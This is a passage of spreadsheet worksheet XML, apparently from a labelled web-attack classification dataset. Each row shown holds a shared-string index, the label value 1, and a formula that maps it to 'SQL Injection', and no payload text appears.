      <c r="B17187">
        <v>1</v>
      </c>
      <c r="C17187" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17188" s="1" t="s">
        <v>13763</v>
      </c>
      <c r="B17188">
        <v>1</v>
      </c>
      <c r="C17188" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17189" s="1" t="s">
        <v>24387</v>
      </c>
      <c r="B17189">
        <v>1</v>
      </c>
      <c r="C17189" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17190" s="1" t="s">
        <v>24728</v>
      </c>
      <c r="B17190">
        <v>1</v>
      </c>
      <c r="C17190" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17191" s="1" t="s">
        <v>12381</v>
      </c>
      <c r="B17191">
        <v>1</v>
      </c>
      <c r="C17191" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17192" s="1" t="s">
        <v>17397</v>
      </c>
      <c r="B17192">
        <v>1</v>
      </c>
      <c r="C17192" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17193" s="1" t="s">
        <v>14176</v>
      </c>
      <c r="B17193">
        <v>1</v>
      </c>
      <c r="C17193" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17194" s="1" t="s">
        <v>14899</v>
      </c>
      <c r="B17194">
        <v>1</v>
      </c>
      <c r="C17194" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17195" s="1" t="s">
        <v>25861</v>
      </c>
      <c r="B17195">
        <v>1</v>
      </c>
      <c r="C17195" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17196" s="1" t="s">
        <v>14075</v>
      </c>
      <c r="B17196">
        <v>1</v>
      </c>
      <c r="C17196" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17197" s="1" t="s">
        <v>13822</v>
      </c>
      <c r="B17197">
        <v>1</v>
      </c>
      <c r="C17197" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17198" s="1" t="s">
        <v>15311</v>
      </c>
      <c r="B17198">
        <v>1</v>
      </c>
      <c r="C17198" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17199" s="1" t="s">
        <v>19058</v>
      </c>
      <c r="B17199">
        <v>1</v>
      </c>
      <c r="C17199" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17200" s="1" t="s">
        <v>25284</v>
      </c>
      <c r="B17200">
        <v>1</v>
      </c>
      <c r="C17200" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17201" s="1" t="s">
        <v>19097</v>
      </c>
      <c r="B17201">
        <v>1</v>
      </c>
      <c r="C17201" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17202" s="1" t="s">
        <v>15111</v>
      </c>
      <c r="B17202">
        <v>1</v>
      </c>
      <c r="C17202" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17203" s="1" t="s">
        <v>24750</v>
      </c>
      <c r="B17203">
        <v>1</v>
      </c>
      <c r="C17203" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17204" s="1" t="s">
        <v>16896</v>
      </c>
      <c r="B17204">
        <v>1</v>
      </c>
      <c r="C17204" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17205" s="1" t="s">
        <v>24683</v>
      </c>
      <c r="B17205">
        <v>1</v>
      </c>
      <c r="C17205" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17206" s="1" t="s">
        <v>18822</v>
      </c>
      <c r="B17206">
        <v>1</v>
      </c>
      <c r="C17206" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17207" s="1" t="s">
        <v>14638</v>
      </c>
      <c r="B17207">
        <v>1</v>
      </c>
      <c r="C17207" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17208" s="1" t="s">
        <v>18068</v>
      </c>
      <c r="B17208">
        <v>1</v>
      </c>
      <c r="C17208" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17209" s="1" t="s">
        <v>12884</v>
      </c>
      <c r="B17209">
        <v>1</v>
      </c>
      <c r="C17209" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17210" s="1" t="s">
        <v>16124</v>
      </c>
      <c r="B17210">
        <v>1</v>
      </c>
      <c r="C17210" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17211" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17211" s="1" t="s">
        <v>13720</v>
      </c>
      <c r="B17211">
        <v>1</v>
      </c>
      <c r="C17211" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17212" s="1" t="s">
        <v>24822</v>
      </c>
      <c r="B17212">
        <v>1</v>
      </c>
      <c r="C17212" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17213" s="1" t="s">
        <v>14350</v>
      </c>
      <c r="B17213">
        <v>1</v>
      </c>
      <c r="C17213" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17214" s="1" t="s">
        <v>17920</v>
      </c>
      <c r="B17214">
        <v>1</v>
      </c>
      <c r="C17214" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17215" s="1" t="s">
        <v>12559</v>
      </c>
      <c r="B17215">
        <v>1</v>
      </c>
      <c r="C17215" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17216" s="1" t="s">
        <v>24799</v>
      </c>
      <c r="B17216">
        <v>1</v>
      </c>
      <c r="C17216" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17217" s="1" t="s">
        <v>17340</v>
      </c>
      <c r="B17217">
        <v>1</v>
      </c>
      <c r="C17217" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17218" s="1" t="s">
        <v>15041</v>
      </c>
      <c r="B17218">
        <v>1</v>
      </c>
      <c r="C17218" s="7" t="str">
        <f t="shared" si="268"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17219" s="1" t="s">
        <v>15773</v>
      </c>
      <c r="B17219">
        <v>1</v>
      </c>
      <c r="C17219" s="7" t="str">
        <f t="shared" ref="C17219:C17282" si="269">IF(B17219=0,"No Attack", IF(B17219=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17220" s="1" t="s">
        <v>15161</v>
      </c>
      <c r="B17220">
        <v>1</v>
      </c>
      <c r="C17220" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17221" s="1" t="s">
        <v>19434</v>
      </c>
      <c r="B17221">
        <v>1</v>
      </c>
      <c r="C17221" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17222" s="1" t="s">
        <v>26090</v>
      </c>
      <c r="B17222">
        <v>1</v>
      </c>
      <c r="C17222" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17223" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17223" s="1" t="s">
        <v>14465</v>
      </c>
      <c r="B17223">
        <v>1</v>
      </c>
      <c r="C17223" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17224" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17224" s="1" t="s">
        <v>17372</v>
      </c>
      <c r="B17224">
        <v>1</v>
      </c>
      <c r="C17224" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17225" s="1" t="s">
        <v>15709</v>
      </c>
      <c r="B17225">
        <v>1</v>
      </c>
      <c r="C17225" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17226" s="1" t="s">
        <v>25872</v>
      </c>
      <c r="B17226">
        <v>1</v>
      </c>
      <c r="C17226" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17227" s="1" t="s">
        <v>18100</v>
      </c>
      <c r="B17227">
        <v>1</v>
      </c>
      <c r="C17227" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17228" s="1" t="s">
        <v>19490</v>
      </c>
      <c r="B17228">
        <v>1</v>
      </c>
      <c r="C17228" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17229" s="1" t="s">
        <v>25469</v>
      </c>
      <c r="B17229">
        <v>1</v>
      </c>
      <c r="C17229" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17230" s="1" t="s">
        <v>14468</v>
      </c>
      <c r="B17230">
        <v>1</v>
      </c>
      <c r="C17230" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17231" s="1" t="s">
        <v>18357</v>
      </c>
      <c r="B17231">
        <v>1</v>
      </c>
      <c r="C17231" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17232" s="1" t="s">
        <v>20000</v>
      </c>
      <c r="B17232">
        <v>1</v>
      </c>
      <c r="C17232" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17233" s="1" t="s">
        <v>15917</v>
      </c>
      <c r="B17233">
        <v>1</v>
      </c>
      <c r="C17233" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17234" s="1" t="s">
        <v>14403</v>
      </c>
      <c r="B17234">
        <v>1</v>
      </c>
      <c r="C17234" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17235" s="1" t="s">
        <v>15018</v>
      </c>
      <c r="B17235">
        <v>1</v>
      </c>
      <c r="C17235" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17236" s="1" t="s">
        <v>14398</v>
      </c>
      <c r="B17236">
        <v>1</v>
      </c>
      <c r="C17236" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17237" s="1" t="s">
        <v>26489</v>
      </c>
      <c r="B17237">
        <v>1</v>
      </c>
      <c r="C17237" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17238" s="1" t="s">
        <v>17215</v>
      </c>
      <c r="B17238">
        <v>1</v>
      </c>
      <c r="C17238" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17239" s="1" t="s">
        <v>24525</v>
      </c>
      <c r="B17239">
        <v>1</v>
      </c>
      <c r="C17239" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17240" s="1" t="s">
        <v>15796</v>
      </c>
      <c r="B17240">
        <v>1</v>
      </c>
      <c r="C17240" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17241" s="1" t="s">
        <v>16679</v>
      </c>
      <c r="B17241">
        <v>1</v>
      </c>
      <c r="C17241" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17242" s="1" t="s">
        <v>26032</v>
      </c>
      <c r="B17242">
        <v>1</v>
      </c>
      <c r="C17242" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17243" s="1" t="s">
        <v>14329</v>
      </c>
      <c r="B17243">
        <v>1</v>
      </c>
      <c r="C17243" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17244" s="1" t="s">
        <v>25611</v>
      </c>
      <c r="B17244">
        <v>1</v>
      </c>
      <c r="C17244" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17245" s="1" t="s">
        <v>18638</v>
      </c>
      <c r="B17245">
        <v>1</v>
      </c>
      <c r="C17245" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17246" s="1" t="s">
        <v>17251</v>
      </c>
      <c r="B17246">
        <v>1</v>
      </c>
      <c r="C17246" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17247" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17247" s="1" t="s">
        <v>12766</v>
      </c>
      <c r="B17247">
        <v>1</v>
      </c>
      <c r="C17247" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17248" s="1" t="s">
        <v>25958</v>
      </c>
      <c r="B17248">
        <v>1</v>
      </c>
      <c r="C17248" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17249" s="1" t="s">
        <v>15776</v>
      </c>
      <c r="B17249">
        <v>1</v>
      </c>
      <c r="C17249" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17250" s="1" t="s">
        <v>12827</v>
      </c>
      <c r="B17250">
        <v>1</v>
      </c>
      <c r="C17250" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17251" s="1" t="s">
        <v>13864</v>
      </c>
      <c r="B17251">
        <v>1</v>
      </c>
      <c r="C17251" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17252" s="1" t="s">
        <v>17094</v>
      </c>
      <c r="B17252">
        <v>1</v>
      </c>
      <c r="C17252" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17253" s="1" t="s">
        <v>17150</v>
      </c>
      <c r="B17253">
        <v>1</v>
      </c>
      <c r="C17253" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17254" s="1" t="s">
        <v>19328</v>
      </c>
      <c r="B17254">
        <v>1</v>
      </c>
      <c r="C17254" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17255" s="1" t="s">
        <v>16915</v>
      </c>
      <c r="B17255">
        <v>1</v>
      </c>
      <c r="C17255" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17256" s="1" t="s">
        <v>13504</v>
      </c>
      <c r="B17256">
        <v>1</v>
      </c>
      <c r="C17256" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17257" s="1" t="s">
        <v>19077</v>
      </c>
      <c r="B17257">
        <v>1</v>
      </c>
      <c r="C17257" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17258" s="1" t="s">
        <v>15945</v>
      </c>
      <c r="B17258">
        <v>1</v>
      </c>
      <c r="C17258" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17259" s="1" t="s">
        <v>15762</v>
      </c>
      <c r="B17259">
        <v>1</v>
      </c>
      <c r="C17259" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17260" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17260" s="1" t="s">
        <v>24588</v>
      </c>
      <c r="B17260">
        <v>1</v>
      </c>
      <c r="C17260" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17261" s="1" t="s">
        <v>24542</v>
      </c>
      <c r="B17261">
        <v>1</v>
      </c>
      <c r="C17261" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17262" s="1" t="s">
        <v>26225</v>
      </c>
      <c r="B17262">
        <v>1</v>
      </c>
      <c r="C17262" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17263" s="1" t="s">
        <v>14516</v>
      </c>
      <c r="B17263">
        <v>1</v>
      </c>
      <c r="C17263" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17264" s="1" t="s">
        <v>15815</v>
      </c>
      <c r="B17264">
        <v>1</v>
      </c>
      <c r="C17264" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17265" s="1" t="s">
        <v>15722</v>
      </c>
      <c r="B17265">
        <v>1</v>
      </c>
      <c r="C17265" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17266" s="1" t="s">
        <v>15602</v>
      </c>
      <c r="B17266">
        <v>1</v>
      </c>
      <c r="C17266" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17267" s="1" t="s">
        <v>20043</v>
      </c>
      <c r="B17267">
        <v>1</v>
      </c>
      <c r="C17267" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17268" s="1" t="s">
        <v>14268</v>
      </c>
      <c r="B17268">
        <v>1</v>
      </c>
      <c r="C17268" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17269" s="1" t="s">
        <v>16775</v>
      </c>
      <c r="B17269">
        <v>1</v>
      </c>
      <c r="C17269" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17270" s="1" t="s">
        <v>24581</v>
      </c>
      <c r="B17270">
        <v>1</v>
      </c>
      <c r="C17270" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17271" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17271" s="1" t="s">
        <v>19641</v>
      </c>
      <c r="B17271">
        <v>1</v>
      </c>
      <c r="C17271" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17272" s="1" t="s">
        <v>15938</v>
      </c>
      <c r="B17272">
        <v>1</v>
      </c>
      <c r="C17272" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17273" s="1" t="s">
        <v>12475</v>
      </c>
      <c r="B17273">
        <v>1</v>
      </c>
      <c r="C17273" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17274" s="1" t="s">
        <v>24659</v>
      </c>
      <c r="B17274">
        <v>1</v>
      </c>
      <c r="C17274" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17275" s="1" t="s">
        <v>17108</v>
      </c>
      <c r="B17275">
        <v>1</v>
      </c>
      <c r="C17275" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17276" s="1" t="s">
        <v>19102</v>
      </c>
      <c r="B17276">
        <v>1</v>
      </c>
      <c r="C17276" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17277" s="1" t="s">
        <v>14391</v>
      </c>
      <c r="B17277">
        <v>1</v>
      </c>
      <c r="C17277" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17278" s="1" t="s">
        <v>15730</v>
      </c>
      <c r="B17278">
        <v>1</v>
      </c>
      <c r="C17278" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17279" s="1" t="s">
        <v>13771</v>
      </c>
      <c r="B17279">
        <v>1</v>
      </c>
      <c r="C17279" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17280" s="1" t="s">
        <v>13289</v>
      </c>
      <c r="B17280">
        <v>1</v>
      </c>
      <c r="C17280" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17281" s="1" t="s">
        <v>19633</v>
      </c>
      <c r="B17281">
        <v>1</v>
      </c>
      <c r="C17281" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17282" s="1" t="s">
        <v>15581</v>
      </c>
      <c r="B17282">
        <v>1</v>
      </c>
      <c r="C17282" s="7" t="str">
        <f t="shared" si="269"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17283" s="1" t="s">
        <v>13005</v>
      </c>
      <c r="B17283">
        <v>1</v>
      </c>
      <c r="C17283" s="7" t="str">
        <f t="shared" ref="C17283:C17346" si="270">IF(B17283=0,"No Attack", IF(B17283=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17284" s="1" t="s">
        <v>15340</v>
      </c>
      <c r="B17284">
        <v>1</v>
      </c>
      <c r="C17284" s="7" t="str">
        <f t="shared" si="270"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17285" s="1" t="s">
        <v>12657</v>
      </c>
      <c r="B17285">
        <v>1</v>
      </c>
      <c r="C17285" s="7" t="str">
        <f t="shared" si="270"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17286" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17286" s="1" t="s">
        <v>24587</v>
      </c>
      <c r="B17286">
        <v>1</v>
      </c>
      <c r="C17286" s="7" t="str">
        <f t="shared" si="270"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17287" s="1" t="s">
        <v>12192</v>
      </c>
      <c r="B17287">
        <v>1</v>
      </c>
      <c r="C17287" s="7" t="str">
        <f t="shared" si="270"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17288" s="1" t="s">
        <v>25196</v>
      </c>
      <c r="B17288">
        <v>1</v>
      </c>
      <c r="C17288" s="7" t="str">
        <f t="shared" si="270"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="17289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17289" s="1" t="s">
        <v>16275</v>
      </c>
      <c r="B17289">
        <v>1</v>
      </c>
      <c r="C17289" s="7" t="str">
        <f t="shared" si="270"/>
